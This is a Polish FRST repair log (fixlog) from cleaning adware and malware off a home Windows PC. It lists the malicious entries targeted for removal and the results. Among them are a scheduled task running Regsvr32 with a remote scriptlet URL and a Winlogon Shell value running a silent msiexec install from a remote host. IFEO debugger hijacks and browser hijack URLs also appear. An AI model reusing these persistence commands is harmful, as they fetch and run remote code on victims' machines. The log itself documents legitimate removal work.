Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 14-05-2017
Uruchomiony przez Kasia (18-05-2017 16:53:38) Run:6
Uruchomiony z D:\Desktop\max
Załadowane profile: Kasia (Dostępne profile: Kasia)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\ChromeHTML: -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) <==== UWAGA
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.31.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\Kasia\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => Brak pliku
Task: {0659A980-3244-4202-929B-52EA5684F95D} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== scrobj.dll
Task: {EF0F48A4-5D77-4EF5-9E10-B0316862B2DE} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () <==== UWAGA
Task: {F435B3AD-8F34-47FC-8D19-7D1DC252A958} - System32\Tasks\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => pcalua.exe -a C:\Users\Kasia\AppData\Local\Temp\jre-8u131-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1 <==== UWAGA
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerAlertEventConsumer: 
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerPolicyChangeEventConsumer: 
FirewallRules: [{43588AFA-371E-4EB2-809A-A7D0D9562A88}] => (Allow) C:\Program Files (x86)\Bagsarah\Application\chrome.exe
FirewallRules: [{1750B21B-9C19-4DF6-B240-40EEDD753E7C}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{6654B80F-3A65-4B3C-BEF2-F6D9096F8763}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
RemoveDirectory: C:\Program Files (x86)\Bagsarah
RemoveDirectory: C:\Users\Kasia\AppData\Local\Bagsarah
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Bagsarah
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Kasia\AppData\Local\Firefox
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Firefox
ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Local\Bagsarah\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft WSE 3.0\WSE on the Web.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arkusze Google.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=felcaaldnbdncclmgdcncolpebgiejap
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}";
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://www.bigbangempire.com/?ref=281-000-000-005}";
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064
ShortcutWithArgument: C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
Winlogon\Notify\ScCertProp: wlnotify.dll [X]
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [GoogleChromeAutoLaunch_2ADBC5D4CA6B0A1DE744757424E6F2ED] => "C:\Program Files (x86)\Everness\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Run: [background_fault] => C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) <===== UWAGA
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yNjRWMYYxMdVXMWk4MjYcRkVXFdhXRWMyN8F2OWQYRF== /q
RemoveDirectory: C:\Program Files (x86)\Everness
RemoveDirectory: C:\Users\Kasia\AppData\Local\Everness
RemoveDirectory: C:\Users\Kasia\AppData\Roaming\Everness
C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1434916331&z=1812db3e52683682890b67bg3z9caz8tag0qecco5q&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=dspp&ts=1434916399&z=72c6d913177a99cde3b5acagaz6c6zat8gfq2c4t1z&from=cor&uid=TS256GSSD370S_C162661064&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-4102225431-1871780152-3223173906-1000 -> {1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} URL = 
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.ourluckysites.com/?type=sc&ts=1494320924&z=cb2aba3176602e7e4502859g3zbt9z6cdo8e1tdgam&from=che0812&uid=TS256GSSD370S_C162661064
R2 ANSARE; C:\Users\Kasia\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 BIT; C:\ProgramData\BIT\BIT.dll [1857536 2017-05-09] (BIT.dll) [Brak podpisu cyfrowego]
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [97280 2017-05-11] () [Brak podpisu cyfrowego] <==== UWAGA
S2 NPASRE; C:\Users\Kasia\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 OneDirveSrv; C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll [129024 2017-05-10] () [Brak podpisu cyfrowego]
R2 VNASRE; C:\Users\Kasia\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego]
R2 WinSAPSvc; C:\Users\Kasia\AppData\Roaming\WinSAPSvc\WinSAP.dll [585216 2017-05-09] (serviec) [Brak podpisu cyfrowego] <==== UWAGA
U3 pgddapod; \??\C:\Users\Kasia\AppData\Local\Temp\pgddapod.sys [X] <==== UWAGA
C:\Users\Kasia\AppData\Local\ANSARE
C:\ProgramData\BIT
C:\Users\Kasia\AppData\Local\NPASRE
C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll 
C:\Users\Kasia\AppData\Local\VNASRE
C:\Users\Kasia\AppData\Roaming\WinSAPSvc
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox � skr�t.lnk
EmptyTemp:
*****************

Procesy zostały pomyślnie zamknięte.
Punkt przywracania został pomyślnie utworzony.
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\ChromeHTML => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{59B55F04-DE14-4BB8-92FF-C4A22EF2E5F4} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF} => klucz nie znaleziono. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0659A980-3244-4202-929B-52EA5684F95D} => klucz nie znaleziono. 
C:\Windows\System32\Tasks\PowerWord-SCT-JT => nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz nie znaleziono. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF0F48A4-5D77-4EF5-9E10-B0316862B2DE} => klucz nie znaleziono. 
C:\Windows\System32\Tasks\Milimili => nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz nie znaleziono. 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F435B3AD-8F34-47FC-8D19-7D1DC252A958} => klucz nie znaleziono. 
C:\Windows\System32\Tasks\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => nie znaleziono.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1F2A387E-0C8B-4A90-B544-ECB3A1B99015} => klucz nie znaleziono. 
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerAlertEventConsumer: => nie znaleziono
WMI_ActiveScriptEventConsumer_DellCommandPowerManagerPolicyChangeEventConsumer: => nie znaleziono
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{43588AFA-371E-4EB2-809A-A7D0D9562A88} => Wartość nie znaleziono.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{1750B21B-9C19-4DF6-B240-40EEDD753E7C} => Wartość nie znaleziono.
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6654B80F-3A65-4B3C-BEF2-F6D9096F8763} => Wartość nie znaleziono.
"C:\Program Files (x86)\Bagsarah" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\Bagsarah" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Bagsarah" => nie znaleziono.
"C:\Program Files (x86)\Firefox" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\Firefox" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Firefox" => nie znaleziono.
C:\Users\Kasia\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Local\Bagsarah\User Data\Default\Web Applications\_crx_felcaaldnbdncclmgdcncolpebgiejap\Arkusze Google.lnk => nie znaleziono.
C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft WSE 3.0\WSE on the Web.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Arkusze Google.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk => nie znaleziono.
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\big_bang_empire.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => Skrót - argument pomyślnie usunięto.
C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => Skrót - argument pomyślnie usunięto.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk" => nie znaleziono.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk" => nie znaleziono.
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ScCertProp => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_2ADBC5D4CA6B0A1DE744757424E6F2ED => Wartość nie znaleziono.
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość nie znaleziono.
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość nie znaleziono.
"C:\Program Files (x86)\Everness" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\Everness" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Everness" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\background_fault\aswRD.exe" => nie znaleziono.
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoLowDiskSpaceChecks => Wartość nie znaleziono.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz nie znaleziono. 
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz nie znaleziono. 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => klucz nie znaleziono. 
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => klucz nie znaleziono. 
HKU\S-1-5-21-4102225431-1871780152-3223173906-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} => klucz nie znaleziono. 
HKCR\CLSID\{1ACDEAF4-49DC-4E40-AA61-C4AF9D052B43} => klucz nie znaleziono. 
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => Wartość pomyślnie przywrócono
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => Wartość pomyślnie przywrócono
ANSARE => serwis nie znaleziono.
BIT => serwis nie znaleziono.
FirefoxU => serwis nie znaleziono.
NPASRE => serwis nie znaleziono.
OneDirveSrv => serwis nie znaleziono.
VNASRE => serwis nie znaleziono.
WinSAPSvc => serwis nie znaleziono.
pgddapod => serwis nie znaleziono.
"C:\Users\Kasia\AppData\Local\ANSARE" => nie znaleziono.
"C:\ProgramData\BIT" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\NPASRE" => nie znaleziono.
"C:\ProgramData\Microsoft OneDrive\setup\SyncTool.dll" => nie znaleziono.
"C:\Users\Kasia\AppData\Local\VNASRE" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\WinSAPSvc" => nie znaleziono.
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Firefox.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk" => nie znaleziono.
"C:\Users\Public\Desktop\Mozilla Firefox.lnk" => nie znaleziono.
"C:\Users\Kasia\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\firefox — skrót.lnk" => nie znaleziono.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 3080896 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 12348 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Kasia => 347048036 B

RecycleBin => 6833 B
EmptyTemp: => 341.9 MB danych tymczasowych Usunięto.

================================


System wymagał restartu.

==== Koniec  Fixlog 16:54:00 ====